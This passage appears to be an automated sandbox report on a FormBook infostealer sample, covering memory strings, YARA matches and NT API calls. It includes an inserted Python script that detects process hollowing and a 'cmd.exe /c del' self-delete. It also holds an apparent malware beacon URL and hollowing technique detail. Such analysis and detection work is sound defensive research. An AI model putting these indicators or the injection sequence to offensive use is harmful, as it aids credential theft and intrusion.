          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/sk-logabpstatus.php?a=WU4yUk9HM1hMREJoMllPUmRWNzNIQ0pUZ1kxeDdIamU2TFNpZ
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf##
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmp, msdt.exe, 00000006.00000002.640379213.0000000000427000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: msdt.exe, 00000006.00000002.640362214.0000000000420000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033m
          Source: msdt.exe, 00000006.00000002.641165269.0000000002C38000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt
          Source: msdt.exe, 00000006.00000002.640379213.0000000000427000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken77
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033B
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmp, msdt.exe, 00000006.00000002.640379213.0000000000427000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: Scn14.092020.exeString found in binary or memory: https://www.digicert.com/CPS0
          Source: Scn14.092020.exe, 00000000.00000002.378140538.0000000000A6A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417930 NtCreateFile
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_004179E0 NtReadFile
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417A60 NtClose
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417B10 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_004179DA NtReadFile
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417987 NtReadFile
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417B0A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046095D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609610 NtEnumerateValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046096E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046096D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046099A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609B00 NtSetValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609560 NtWriteFile
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0460AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046095F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609760 NtOpenProcess
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0460A770 NtOpenThread
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0460A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046097A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0460B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046098F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046098A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046099D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609A20 NtResumeThread
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609A10 NtQuerySection
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04609A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0460A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C87A60 NtClose
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C87B10 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C879E0 NtReadFile
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C87930 NtCreateFile
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C87B0A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C879DA NtReadFile
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C87987 NtReadFile
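          The NT functions listed for msdt.exe above (NtCreateProcessEx, NtUnmapViewOfSection, NtMapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtQueueApcThread, NtResumeThread) are the primitives behind the process hollowing and thread-injection signatures the report raises. As an added example, not part of the Joe Sandbox report or of the sample, the Python script below runs an ordering check for that sequence over a constructed API trace modelled on the report's process chain (Scn14.092020.exe starting a copy of itself, that copy hollowing C:\Windows\SysWOW64\msdt.exe, and msdt.exe finally running cmd.exe /c del on the original file). The event schema (pid, api, target, arg), the pids, and the stage names are assumptions; real sandboxes and EDRs emit their own formats.

```python
"""Flag a process-hollowing sequence and a self-delete in a sandbox API trace.

Added example, not part of the Joe Sandbox report. TRACE is constructed by
hand to mirror the report's process chain; the (pid, api, target, arg) schema
and the pids are assumptions.
"""
from collections import defaultdict
from typing import Iterable, NamedTuple


class ApiEvent(NamedTuple):
    pid: int          # calling process
    api: str          # API name as the tracer reports it
    target: int       # process the call acts on (== pid for local calls)
    arg: str = ""     # free-form detail, e.g. an image path or command line


# Stages of classic hollowing, in order. Each stage is satisfied by any of the
# listed API names; stages must be hit in order, unrelated calls in between are fine.
HOLLOWING_STAGES = (
    {"CreateProcessInternalW:CREATE_SUSPENDED", "NtCreateProcessEx"},   # victim created suspended
    {"NtUnmapViewOfSection"},                                            # original image unmapped
    {"NtWriteVirtualMemory", "NtMapViewOfSection"},                      # payload copied or mapped in
    {"NtSetContextThread", "NtQueueApcThread"},                          # entry point redirected
    {"NtResumeThread"},                                                  # payload starts
)


def find_hollowing(events: Iterable[ApiEvent]) -> list[tuple[int, int]]:
    """Return (injector_pid, victim_pid) pairs that walk through every stage in order."""
    progress: dict[tuple[int, int], int] = defaultdict(int)
    hits = []
    for ev in events:
        if ev.pid == ev.target:
            continue                       # a process acting on itself is not injection
        key = (ev.pid, ev.target)
        stage = progress[key]
        if stage < len(HOLLOWING_STAGES) and ev.api in HOLLOWING_STAGES[stage]:
            progress[key] = stage + 1
            if progress[key] == len(HOLLOWING_STAGES):
                hits.append(key)
    return hits


def find_self_delete(events: Iterable[ApiEvent], sample_path: str) -> list[int]:
    """Return pids that spawn a child whose command line deletes the original sample."""
    needle = f"del '{sample_path}'".lower()
    return [ev.pid for ev in events
            if ev.api == "CreateProcess" and needle in ev.arg.lower()]


# Constructed trace. 1000 = packed .NET loader, 1001 = the copy of itself it
# hollows, 6000 = hollowed msdt.exe, 7000 = cmd.exe. Pids are invented.
SAMPLE = r"C:\Users\user\Desktop\Scn14.092020.exe"
TRACE = [
    ApiEvent(1000, "CreateProcessInternalW:CREATE_SUSPENDED", 1001, SAMPLE),
    ApiEvent(1000, "NtUnmapViewOfSection", 1001),
    ApiEvent(1000, "NtWriteVirtualMemory", 1001),
    ApiEvent(1000, "NtSetContextThread", 1001),
    ApiEvent(1000, "NtResumeThread", 1001),
    ApiEvent(1001, "CreateProcessInternalW:CREATE_SUSPENDED", 6000, r"C:\Windows\SysWOW64\msdt.exe"),
    ApiEvent(1001, "NtUnmapViewOfSection", 6000),
    ApiEvent(1001, "NtMapViewOfSection", 6000),
    ApiEvent(1001, "NtSetContextThread", 6000),
    ApiEvent(1001, "NtResumeThread", 6000),
    ApiEvent(6000, "NtAllocateVirtualMemory", 6000),                     # local call, ignored
    ApiEvent(6000, "CreateProcess", 7000, f"cmd.exe /c del '{SAMPLE}'"),
]

if __name__ == "__main__":
    for injector, victim in find_hollowing(TRACE):
        print(f"hollowing: pid {injector} -> pid {victim}")
    for pid in find_self_delete(TRACE, SAMPLE):
        print(f"self-delete: pid {pid} spawned cmd.exe to remove the sample")
```

          One caveat that follows from the report itself: the msdt.exe stubs above sit at 0x046095xx and the pdb strings list a second wntdll.pdb image at 0x045A0000 inside msdt.exe, so the payload is issuing these calls through its own mapped copy of ntdll rather than the loaded one. A tracer that only hooks exports of the original ntdll.dll will not see that sequence; kernel-side telemetry (ETW threat-intelligence events, driver callbacks, or a sandbox like the one that produced this report) is the reliable source for the events the script consumes.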
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 0_2_00CB2B78
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 0_2_00CB04C8
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 0_2_00CBF630
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 0_2_00CB04B8
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 0_2_00CBF61F
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00408A40
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041C2A7
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041ABE3
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041ABE6
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041B464
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041BCC5
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00402D89
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041B619
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00402FB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0468D466
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045EB477
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045D841F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04684496
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04691D55
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04692D07
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045C0D20
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046925DD
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045DD5E0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045F2581
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04682D82
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045E6E30
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0468D616
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04692EF7
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04691FF1
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0469DFCE
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0469E824
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04681002
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045EA830
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046928EC
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046920A8
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045DB090
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045F20A0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045CF900
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045E4120
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045E99BF
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0467FA2B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04684AEF
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046922AE
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045EAB40
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0466CB4F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_04692B28
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045EA309
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046723E3
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045FABD8
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_046803DA
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0468DBD2
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045F138B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_045FEBB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C8C2A7
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C78A40
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C8ABE3
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C8ABE6
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C8B619
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C72FB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C8BCC5
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C8B464
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C72D89
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C72D90
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 045CB150 appears 136 times
          Source: Scn14.092020.exe | Static PE information: invalid certificate
          Source: Scn14.092020.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Scn14.092020.exe | Binary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: Scn14.092020.exe, 00000000.00000002.378140538.0000000000A6A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Scn14.092020.exe
          Source: Scn14.092020.exe | Binary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: Scn14.092020.exe, 00000001.00000002.418209930.000000000185F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Scn14.092020.exe
          Source: Scn14.092020.exe, 00000001.00000002.419109090.00000000034D0000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemsdt.exej% vs Scn14.092020.exe
          Source: Scn14.092020.exe | Binary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
